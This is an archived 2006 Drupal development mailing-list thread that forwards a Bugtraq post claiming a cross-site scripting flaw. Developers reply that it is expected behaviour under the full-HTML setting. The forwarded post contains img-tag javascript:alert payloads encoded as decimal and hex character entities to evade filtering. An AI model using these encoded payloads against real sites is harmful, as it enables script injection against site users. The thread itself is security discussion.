[development] [liz0@bsdmail.com: Drupal all versiyon xss cehennem.org]

puregin puregin at puregin.org
Thu Jan 5 01:56:05 UTC 2006 

As chx pointed out on bugtraq, and on this list,
this is not a vulnerability but a 'feature':
allowing full HTML in posting means
what it says.

Let's kill this topic.



On 4-Jan-2006, at 1:37 PM, Darrel O'Pry wrote:

> I tried to reproduce this, but was unable to... anyone else have any
> luck?
>
> On Tue, 2006-01-03 at 21:08 +0100, Piotr Krukowiecki wrote:
>> This is from bugtraq...
>>
>> email message attachment
>>> -------- Forwarded Message --------
>>> From: liz0 at bsdmail.com
>>> To: bugtraq at securityfocus.com
>>> Subject: Drupal all versiyon xss cehennem.org
>>> Date: 2 Jan 2006 10:45:25 -0000
>>>
>>> Drupal all versiyon xss
>>> ----------------------------------------------------
>>> site:http://www.drupal.org
>>>
>>> Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
>>> --------------------------------------------------
>>>
>>> img tag : on
>>>
>>> -------------------------------------------------------------------- 
>>> -------------------------------------------------------------------- 
>>> -----------------------------
>>>
>>> Decimal Value: HTML (without semicolons)
>>>
>>> <img src=javascript:alert('XSS')>  = <img  
>>> src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#10 
>>> 1&#114&#116&#40&#39&#88&#83&#83&#39&#41>
>>> -------------------------------------------------------------------- 
>>> -------------------------------------------------------------------- 
>>> -----------------------
>>> Decimal Value: HTML (with semicolons)
>>>
>>> <img src=javascript:alert('XSS')>  = <img  
>>> src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6 
>>> C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
>>>
>>>
>>> -------------------------------------------------------------------- 
>>> -------------------------------------------------------------------- 
>>> -----------------------
>>> example:
>>> post message :<img src=javascript:alert('XSS')> not Vulnerable  
>>> but <img  
>>> src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#10 
>>> 1&#114&#116&#40&#39&#88&#83&#83&#39&#41> Vulnerable
>>>
>>> post mesage  :<img src=javascript:alert('XSS')> not Vulnerable  
>>> but <img  
>>> src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6 
>>> C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> Vulnerable
>>>
>>>
>>> ---------------------------------------------------------
>>>
>>> Credit:Liz0ziM
>>> mail:liz0 at bsdmail.com
>>> www.biyo.tk , www.cehennem.org
>>>
>>> Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect 
>>> ,cyberlord and all friend
>>>
>>> -----------------------------------------------------------
>>> Source:
>>>
>>> http://liz0zim.no-ip.org/drupal.txt
>>>
>>> ------------------------------------------------------------
>>>
>>>

More information about the development mailing list